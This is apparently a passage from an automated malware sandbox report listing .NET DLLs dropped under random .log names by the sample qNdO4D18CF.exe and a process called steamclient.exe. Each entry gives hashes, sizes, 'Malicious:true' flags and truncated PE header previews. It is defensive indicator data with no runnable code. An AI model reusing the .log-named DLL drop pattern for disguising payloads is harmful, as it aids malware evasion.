                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\dCQWQdrl.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\dpMkGxhC.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\epactCHB.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33792
                                                                  Entropy (8bit):5.541771649974822
                                                                  Encrypted:false
                                                                  SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                  MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                  SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                  SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                  SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\eqUeBrnj.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):69632
                                                                  Entropy (8bit):5.932541123129161
                                                                  Encrypted:false
                                                                  SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                  MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                  C:\Users\user\Desktop\fIcWIVzb.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\fQXwQazI.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ffUEpXBW.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\fhkMXHMd.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):46592
                                                                  Entropy (8bit):5.870612048031897
                                                                  Encrypted:false
                                                                  SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                                  MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                                  SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                                  SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                                  SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\gFDeeVNW.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ggiwcdaV.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\hcheWwWA.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\htowkSQD.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23552
                                                                  Entropy (8bit):5.519109060441589
                                                                  Encrypted:false
                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\iPDDuStZ.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):32256
                                                                  Entropy (8bit):5.631194486392901
                                                                  Encrypted:false
                                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ifdmuvPD.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\iiUfyMfQ.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):23552
                                                                  Entropy (8bit):5.519109060441589
                                                                  Encrypted:false
                                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ipiVsaGZ.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\jEEdizHN.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\jUVbmMDs.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\kWYnjZbO.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\kWtSUqip.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\qNdO4D18CF.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....~..........n.... ........@.. ...............................G....@.....................................O.................................................................................... ............... ..H............text...t|... ...~.................. ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........c...8...........b.......................................................................................................................................................................,....:;.....>..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\kixEeWsX.log

                                                                  Download File
                                                                  Process:C:\Program Files (x86)\Steam\steamclient.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):34304
                                                                  Entropy (8bit):5.618776214605176
                                                                  Encrypted:false
                                                                  SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                                  MD5:9B25959D6CD6097C0EF36D2496876249
                                                                  SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                                  SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                                  SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                                  Malicious:true
